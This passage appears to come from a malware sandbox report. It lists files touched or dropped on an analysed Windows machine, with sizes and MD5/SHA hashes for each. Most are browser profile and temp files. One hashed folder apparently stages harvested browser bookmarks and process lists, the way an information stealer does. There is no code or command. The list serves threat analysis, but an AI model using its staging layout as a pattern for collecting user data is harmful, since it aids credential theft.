c72428d5b415719c73b6a102e60aaa6ad94bdc9273ca9950e637a91b3106514e

SHA512
f3fc16fc45c8559c34ceba61739edd3facbbf25d114fecc57f61ec31072b233245fabae042cf6276e61c76e938e0826a0a17ae95710cfb21c2da13e18edbf99f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Filesize
322B

MD5
e8aa62ec13a423fc05ab01de3a990161

SHA1
8b92a95e7864e8e1abc7b04bd3910a91c4d531a9

SHA256
82cef945045a94198993b6419813705bf3907e2aa8841415100f60caf680e0f1

SHA512
10a84183923bc04b5ddd142aa5f0b6835390b08e0e8607dae07587f0c35a69c444cf6399bbfe34d219c472bc03f3f9b1f70ad19355d40caf078a2f1eb7aeef14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13384550239283918

Filesize
1KB

MD5
7a03025c65146289d495b53d4737e0dc

SHA1
6f915a143d39a1208831a914741269fb18ec3fa7

SHA256
7e118099826c7ca89a135231a99319d5492ea97cf8ba7cb2aee67a57b0b1974c

SHA512
e89f9af3f7209c71bbbe515a7e498945215e889057fffc81908de78deb7bac43a29829458d336069ab8bb5c2b3cabb7e84ddbfdc410d1cf9fecd9b1d4e58cbd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

Filesize
112B

MD5
0eb49d0f89f1314c35ebca098ac9b95a

SHA1
5f69a05497fb4195435e87fdadf89b827ab6d193

SHA256
5aef34b8387d503846377440662aefa8d8fcf5fd3e273fd5e8c5f79169b35f7c

SHA512
67948e01b43a9e02256c6df0439e5797d1f639b164b432e4246332f35b13ecb44620c37341dba418e9fb9d2b9436ff4c46c7215ae334a1d08ea17dc9127ad796

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
0dacbf6644cedf80f60f905ad565f289

SHA1
da134e05bc0ea0c3eb21d3652875a4767858bd7d

SHA256
e6b3c26c9f8c75574d47fd2db00eca412478f62c062b026ecfd70b5336e15022

SHA512
829c1137a87b8e1489856a37b19e2a3111a8bd0af752ea772588cf65d46414ceb95b25837def55f8e2ae773ccff42836b8288c090e8d1169f3c01201dbbe83d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
43fabae66caa1b153e00a0bbfa6cb2d1

SHA1
cea9aec2e71a2d5344406fab0c7a71fe00a55563

SHA256
e89f313ff5c7e00510ace10d9281db7947cda4069f275d67a29dfe9a53f1b3d9

SHA512
0470b8aeda4d30a37e761d613759857eae66c0207bc1ab594b583dae637cd206e228a09f085a6ea0355e28b841afb763493601c8e3f9da89b982e924d94e4a32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
204B

MD5
16682d86845293ab794fe4d3bdedb199

SHA1
66bfa06d23408398e8c4db5e206db01b31650b5f

SHA256
e3c4854575d975ddcd36875db3e5058026f005ed015b2c0f86cad58cc4dbfd88

SHA512
55ad8213248b705e08e30f06542a569216d73013fc36619df5de9a2468fcdd01460443b5f698351e241b40c46ac365d1fddcbbc4ff8c65f18687ad6c56d12efa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
204B

MD5
91c5e6f601dac4de1329368bc21c7480

SHA1
492dce813adbae690d3e6334b12de7c8030ba7e6

SHA256
a8bef3b5743d07b257b3977b56c38caf106605633b8a4b797605e5204ba03c62

SHA512
0425bff0f6acf3206be54885feb980f99da37c0411d4da08a46a99333822fc4420946230cb72fff4bfc777b0ededb0eace79cea8de56ecd8bbef86049a0fbf00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Filesize
128KB

MD5
6907322496999944b74c789152923a87

SHA1
01a450aec07314183813df89577c308e5719fcee

SHA256
445590e5199b433b727a377e35307abec579a3999505ee8ccd12a47eb907efb1

SHA512
6045ee73297f56236df6da2dbd7f28f159890280c7c799e2baddbce2a6a8ad96cc7c2f91bcf8fea9194f9272f48452fa08bd843718b79993380e4c72a23c3a3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG

Filesize
136B

MD5
17cd080e36cc152af1925574a6533b0a

SHA1
d85d7e49cc52a17f18f6a9e1853a9040c653629f

SHA256
09ef257523a53d902673e244be4cabf28925ce3cb3ad9f2af203d9377106fa1d

SHA512
c70a863e11dc937bb441d2a4edea87d0b4b977405e6344980113363db3d68c260d3fd89f50ef6a1327a3fa1db9243af79a8e9ce942c491cb96368ce57c51d662

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
44KB

MD5
f38f9f38b645481cb74ddf98a0dca982

SHA1
0c27eb42e28fa0f95d27d14abd6c77aa31d0d9aa

SHA256
588ee55880c71f13f84229daeb0b8908647dbe57a501607fcd77ad3ad01884b4

SHA512
78a8cc9eefbda4a6d25a5fe8b98b15eb253d6a702ef48eb3d028e6a67c4fd82ceb62b658e776d7a27062f4cf472f3256b6003ed0a0c889d1d55beed35a180f53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Filesize
187B

MD5
a4f4fe6b1eddfad04c8d37c2a33cc500

SHA1
a50d687addd09964e164ac802b9012019a59c892

SHA256
f61c5fcba88e712d7fa0ae5e8ae5179323dc1c8fda7e2a150e14628215b8d4d6

SHA512
7da59716d51a87167050588c389cc7ffe713743d3f7c1841d123292d3f30192963e79072d3eac7fc3fd392ff03a231b441ce714aa2857762e2acc76138a5576b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Filesize
322B

MD5
9c478e289d6deba20e92f1d221dc9c75

SHA1
7790a04ff250d4d47c02abb4d62df32059be47d5

SHA256
45aa3239e8dc4ed9802280a5cddb39bdc8ecacdf8379d642d3e7691e518c7d2a

SHA512
fb5d692a4c1eecf8909b5b815953ae1b4e3c173b2a26af5ee1e5f1584ebcfbe7d49dc56d809246b738e8c4b5ae0e0360726cbcc0e016f08e7ccce27b7aceda9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
594B

MD5
18d7f20b8b4ff95bf942272f1a86bdc0

SHA1
c5b3c1bc020bf26b00f9d9d3f3c745a5f983ca82

SHA256
02b3a5b5318e7646bc8b2f09b02ba9f74184ba5c99570d3820a5c00aebb5dfaa

SHA512
ec7d899efa89f7f1cd68357aa9162cc68ca9241ca1cfcc340719457cbe30358ed97a61e8c6c05197046515a09cfb4417ec80d84a2e94b6ef275d2a00b53904b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Filesize
340B

MD5
6da3d4df9411c4482f3c6fbebd05e75e

SHA1
b1b45a7cfa7c5cdfcdf2e1e181a773e4e86b73f9

SHA256
8cdcfd73cf535757bf9a1ac82784ccc5386273aca433bd490af9b2b88ddfe532

SHA512
ead3f23c9677e6a8c1ce5bbf7a1d59613d3cefd4a59017d6131e269004292e243fac4841a87b8efd4718a6c5b9ca4733483110a6e0cc408ad4ebbd3895b6b537

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
27c0b689f37797a3d5c4bb60f5b4daf8

SHA1
2581b62a1950ac3836a55630c78b0032d5c62617

SHA256
2ce5790a0108b543891428a03619f6236a7a105865e393ad4cd7343fe2e06be9

SHA512
01e20dc293fdd645bdc40a84864e1223b192b453f6e19e31778149a165a8e7ca5413b4c465f9726626f109dc5fb7cdfa68183fe17247e342ef48cbcf8b271698

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
e2a766bfc0538fc59181b8707bccd5e3

SHA1
9caa2c23cb5fc2d593434d837b602a17edac7cdd

SHA256
572e30e8f2d2c1e661d2e4daee7b6e36a781ed4e15e3fe4b6b916793f3f2ba41

SHA512
89c099b104a372daaf9d8173c67683da84775de437f3cba52a2b874b6a505831beebc12e5b524fe2ab606da5f57273bd8f89db36eeb9892b678245fb7459e5a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Filesize
4.0MB

MD5
906bbb84d4398ad4b350015c7b55460f

SHA1
836827431642753f3629033c1742fa1a681f4163

SHA256
e261a87c543b04c97661e98abfb4b436cbee20a1ea8f3e89a489b7fa9482fc20

SHA512
49ed5ff345e56f524f3411811e0b1f6428244e51d858758c9ca1987d9b9ec36cd6970c7cf9ca5404bbc02be32047035c893c64c15dcef7d23837569216969405

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
bc848aa0915cef0d7289c0a509b35cf9

SHA1
31fc653ee1f7c71efdef36ba1232ea904038bd1b

SHA256
4099efb2a946dfbb79f660a3952d24559ae0359aa6c44149267cf22dea48bbca

SHA512
6405bb3ae6a2a1d4d2210469e6caab65c53bc3033d9291bcdc85dceb08020a43153bfc354cb6443bff8a9e1f578a451648013500895bf0004244501c874a4d45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
818a43f93cfd8f09183af4400a25ff27

SHA1
3b55bddcf2b98dce92df49895a8357113f67c181

SHA256
c06562dc56dce4fd1ae79bdf1e31c907a1a3d8610b452c812b30453018037461

SHA512
e2813483971468123aaad40c7aa168e5b1bb3deba875d12079cc2adce01195004780e2db47c377e75293305b6ae0c4502bc07dc012ff669bd868a03f61717b5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

Filesize
4B

MD5
ffad840836a59d98759df4baf3ae1249

SHA1
4df8252e4869a356f0e66d0612ad2903e9c3b580

SHA256
ed6b07b7ebb160617a701e0d070d6291ff9b2756002bbeaa31162f38a38a7635

SHA512
efdbc87f6619b885a098361538cc55d8d51ec1d65fb1c3202d3e051934261e91a054ddb3b32c246dc4d7d977b4b68242114b257a79eb25810cc9381bda8f0450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
a48caa8192b79833b5d4cf9a236d899f

SHA1
781236f0181d5767e5d35fd294b580a597bf2072

SHA256
a00a86ca534c14a8bc10486c96f824a3945982367ea3d9275b1476148af9fffa

SHA512
cab42c454c4dc7dee2f4b222bf9bbe4a097e6e2eb629c850aeed305bac4744afdb181be740d1237ffc7368fe0c1ae5f754536f85927007e40e3161261621a3c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e936ffde1732f536cc835ed3e6c83842

SHA1
05a7c09e599c32003ea21329932a032ace4f592c

SHA256
da9997a3db22d4c3b7900392af3d4a88d09de0df6c4a75d89ea1b271edbb2552

SHA512
35d49450a82c671843080c2ff2ff0d33aa5640234958b7e417a9c2f9e20e24b752a4793a99662253e7ad892dcd70904f6524d5e71c0d80333d7d01741c115870

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3add620c78eac43afe21542269848b69

SHA1
ea9e7c586f20628bc2cf20583627fa17dfa4320b

SHA256
bb51acfa7087782d868223f329af63cb93485420523613feefbeccf9f70061ff

SHA512
4dc9c6d5e64996f81f50cde6004c6ba13abfc7b71131495409c1b31d7b5c379de89cc8aa4acf84772eb4c512e90d1d39ee088e7062474a3df2c9cabe20363c8d

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2psyjw2x.default-release\activity-stream.discovery_stream.json

Filesize
21KB

MD5
61d2129aae5aea1338473b126a03fbe4

SHA1
0c19efc3a8ba930d751d2e8b73d41da332300931

SHA256
062d18bfd0ba652eb06556f5c81ae9598b835094c606c24a8c5ef6e64823ed7c

SHA512
55cd903850dcd3c26381233f59c66af2f57d3f1beefee09b4863b42f91dcdf68737bb03e2df4a8e05ffa556337f414e3f0c9ea98d899a0e3d9c878e062579689

Download Submit
C:\Users\Admin\AppData\Local\Temp\NDFD6E7.tmp

Filesize
2KB

MD5
e47c6286cc4dda2622dbd3f3969835bb

SHA1
a2f396dae7217f1c18305d6a9fe65f17180364ee

SHA256
22917a917a1f10a27dc334acc2bd8ac3224a2372a9aeccd72e91ad0c270b90a1

SHA512
8ed7838b71ebd7659ddd2dd516b02d212a13afb209dc8a7a1c13078cb94f36177806b59e0fc0af074f9a6af3688d4451d8094db780f2b560e1a78e7011165b8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uhnyumjx.g2u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA71B.tmp.dat

Filesize
114KB

MD5
367cb6f6eb3fdecebcfa233a470d7a05

SHA1
9df5e4124982b516e038f1679b87786fd9f62e8b

SHA256
9bcce5a2867bacd7b4cef5c46ba90abb19618e16f1242bdb40d808aada9596cb

SHA512
ed809f3894d47c4012630ca7a353b2cf03b0032046100b83d0b7f628686866e843b32b0dc3e14ccdf9f9bc3893f28b8a4848abff8f15fd4ac27e5130b6b0738d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA71D.tmp.dat

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA730.tmp.dat

Filesize
5.0MB

MD5
a944b1098f38485b940039ce8723af96

SHA1
48c9f40da668eb7cf77dfa385f1dbfbd263e9673

SHA256
82b7f5285d5726157af4e5a5dd8a239aa3db1a980206bb68b2d760b44bfcccef

SHA512
86c10bc95a8766feadf41197c41a8fc34776c7155554cc9f7e7621b52700e7978a3b3afe172a3954caeeba449902d10bb7b1e40acd69467765567e2e37df35eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Local\c19276895f1b24380805e01be38f914d\Admin@QVLSXUFA_en-US\Browsers\Mozilla\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\Users\Admin\AppData\Local\c19276895f1b24380805e01be38f914d\Admin@QVLSXUFA_en-US\System\Process.txt

Filesize
860B

MD5
5fb689452de86f1efe975cfa46d501b1

SHA1
6d75d59964acc26c9d54251410afb262a360d7c6

SHA256
39eaf5d7fc954bec322599ce3afe46fb487cc4eedbdf5414b05f9e0c80e99afe

SHA512
548803fe1d6ff0a1c64b735342094b05f9d047a4796177fb9d028c42d4873cfded9c5ccea811d8a208873ab0dc106f7d6d6b8011ba2c61e48772d13bf2c93500

Download Submit
C:\Users\Admin\AppData\Local\c19276895f1b24380805e01be38f914d\Admin@QVLSXUFA_en-US\System\Process.txt

Filesize
1KB

MD5
1927478bb1a2cd2c4982798b0a2596ff

SHA1
62225ad7eaa2d0f650079d0aeda1bc0dab0edfc5

SHA256
85d2238863d29a475ba21d0dd907bd6712f82f2bd25b01b51759fdd83d0b1314

SHA512
777d11a97cea2de5cb6a1fb13ca65a3ce17d2a176cabf522cd84c85927bb58a6b5494af688332ee226076f6666a63b4a46520d29a4ee50f927950b9dd381bf4f

Download Submit
C:\Users\Admin\AppData\Local\c19276895f1b24380805e01be38f914d\Admin@QVLSXUFA_en-US\System\Process.txt

Filesize
12KB

MD5
9cdb288ce919c3b56860e4ee1e952fbc

SHA1
3bda6d8a04b41bebe3ad16d8b6634da39f7c0c0d

SHA256
c9c0f247af86f96db82fb740d124da5de3bfc1f10156ff9102c6b3c3094ad71b

SHA512
0005780bf111a55e5a177a33529b4802e380541b28898f25807488185493dee403437be7c3154fa4f4e4af4c474ab5c4005d86f0912b585700ec61e9442f1c02

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
15KB

MD5
0bc4d823415baf37656d09543a51d4e1

SHA1
3ea32a1159a9eb7cc6f2acc64b43be71d90173d7

SHA256
4b3147900c16fc5fe5e3eb541405863837385296bf235f7acce3e580695a1bee

SHA512
90128528007cac3995d16a415b07ca6e1d1d96670741c268e85225d1bd42492ff0544180d9695beaa8f34ebca530c9e47e9425b1661f7a9177caba00607d381b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H35U5569JAN8E0IY9BQD.temp

Filesize
15KB

MD5
845a57813a57339cb02b86bc161aa528

SHA1
c60aa2fa545a1a0b518a92432ef682404f9e89b5

SHA256
8e45bd825602411866d931718724dd59853082c61e8073b8907d27acbbf5a842

SHA512
f984a11c507e0b5e1dc7b7f7b23d119b66ac13b6d4c8c3056a79f192ad09f22ee73c82ee2a7d453df8349e172e5b1799ccacaa6b09378c2343d3939d3b8dda49

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\AlternateServices.bin

Filesize
8KB

MD5
b32012ab5135418dfd930011900ff420

SHA1
69bcca4ba10c6640f00e206349dd7058fe5203b8

SHA256
dc91ad73beca2dbb6c77c12329086c5fcd7391e3e295d2c4f6dcca2f9fcd52c2

SHA512
43b66366df6eef3852ed7e61b584f08a23bd335f8bb76acfd4ef69444e72e7c41510fb8315054b13b6d81135eeaf47c665c85e33d8dc8ac7e4cdb84d099db030

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
3fb02266394ed62fca34a4508a794ff3

SHA1
d1526d9b0a459615326f3f6ad2dc01f0ba437ddb

SHA256
b67ea13acae4aea88eedf61e26be898b894e05c4efa791dfe20a2236b62b8a3a

SHA512
743a093167253089ebbc0b87ce7d7cdceeb2b26572eda7b64ed41ea86d09831b078a9843be718243ba7a1b841383cf20a22da9520fd5842799245be3222cfd23

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.tmp

Filesize
17KB

MD5
27d3f53c67ce04ccc7ddc5e731e59e4a

SHA1
4e8ef511999ba2dcf40034595898eeab5de8c7d9

SHA256
6eb32fe6ed6a080935a500071af9247cd8f3a0a9b812baf2a40b21ae4fb99c14

SHA512
a1d21b1b5d14219f32684ce0f10e25e8dcd5287bb94a76fd3944f0f4eb286f6a1e2268aff0ee33151863880c7543ac403ddda6edc4b1e46a844c96e39aaaf804

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.tmp

Filesize
37KB

MD5
13d261625dfaa8e6c3010d79d8a6d88c

SHA1
b189d1ef5a8ce79b544de6260c04b7c71f8e2ee2

SHA256
2c8520fd66f6da0af6aabd30e188db1e726978a63b4fee80cc0e457d8239a976

SHA512
f64058a9c97d05446410b3ba4cf21a3aecadd0e8d036b7cd3fe4cc0a6deaac1fe143d933739b37cdd7e4e8770025583bc6dc7c7891c7337f925ff1378c0c1d36

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\pending_pings\98d14210-ddea-4574-b30a-62de10d15faf

Filesize
982B

MD5
de57fbdd0ad24717960444f84053caef

SHA1
49cfb94381dba70a21329ec9126603cba18a1d0b

SHA256
fd8e05d01c377375877811b5b208684ccb81c4a7fb5dac6e8bec06de4710e967

SHA512
283b40970304c30b99b28cdf18f2fecdbaf8e7a3aeb0d9019b32d99c34436890906605c9d827e9316eff0bbf0c907dfeb6e13c357f1f5396e82a91175e6266eb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\pending_pings\c9adb26c-3836-48db-b6f3-1364c61cccb6

Filesize
671B

MD5
192ac3e1102753c5aaba4955276e30c2

SHA1
cfba68a3d4569a47e3df59aac395923e0b6f8b7f

SHA256
03b62948487196bbdb977edd69484d033c3c4c2f73fa21bcf897b0310e8a0975

SHA512
ba2ddd3554f4c52e090d14175aa40cb0e6b242d16f3e6b0a990a6158012cbe517ce836d2045e0725c1c7061df6f6de89a23aa4b0b706fc7abdf486b1d4d634d6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\pending_pings\fc356c93-679f-42ed-aeec-659bee6834da

Filesize
27KB

MD5
ea211ab96030614a2954721b27e6189b

SHA1
c71071b7c240365484a70a026f8d1e72d37ae6fc

SHA256
9c4d0c74d8e3841359f0044211d15060902a2d6a56f7098596c8f5176bf59911

SHA512
85e7d77a04f06e54f6d5d40e2f55988e57eae26e23f377e43bbd7be38be2f7e0a0fe5d8a812dd96c96d25aad8a2f8f6cb14bf9b4851d6da39abadb9952a85ad1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\prefs-1.js

Filesize
9KB

MD5
56248e87baa7eaf773a6fd52fdbf3531

SHA1
e63d7dc94156b974c5e62a5a52f4f66a8f2e0fd5

SHA256
e4d7708c9af5e47a8d7d807b09397d7994e4d522e76405ab8784fb023c861023

SHA512
df9edf49ff29588417ee6bf611b67cc0760b9a53d69d567aa045a08564f8edef2a2a9345b4d90e3c315891644628898c02c465ebf245d43f2d44547755a6beb5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\prefs-1.js

Filesize
11KB

MD5
b630c7e5b7327b2af32e0fa2a5eaef2e

SHA1
57d1a10eea870bd2a82834ccbc0f379655bdcc29

SHA256
3487b710bed4dbcf0b97a6c033b19c5817a207722d0fa0d1c41f5d9c7e1017e8

SHA512
440209ce1b4a11fde82fee32b636f188f1c4c612a26fbd955f78a207cf83ca82eb3ac71687c11433db46558dd64eb2d996f79e81ba1cc04969cf56a5688e3b7c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\prefs-1.js

Filesize
10KB

MD5
7e2de73831f1c5ebe9c0932c02ea79d3

SHA1
932945cf3595f5d815be67c6e8a4be3bcf2482cf

SHA256
1622341e528add2b941b49f20b511d5faf25af40f75db19a245ff4ca5c274c5b

SHA512
dcf477d33b850e0e85475322ccfd19d18b91c0b1debb74fd0a638124466ac0b27829275e202a6314faac20c8b1c0f1ab328b1c12b126af01a1343d357c8a0bb8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
ef9cc406eee907daa1bf64fc0c7614e1

SHA1
880ad0e65fb25c7d7ff2b7e4c6e615ccf121a52f

SHA256
72cae712eb26d0177690cb5dd1cab38c5141305ca34ecb7d8b943cffbb512dbb

SHA512
892898c9f1c8be9be2b9c30cb433f70d9be5407b459e3e636b74a09c1dd9a1cdc714e8b1442785db84366866b1767ce46615b8a205fa635abe7a601f9f16d836

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
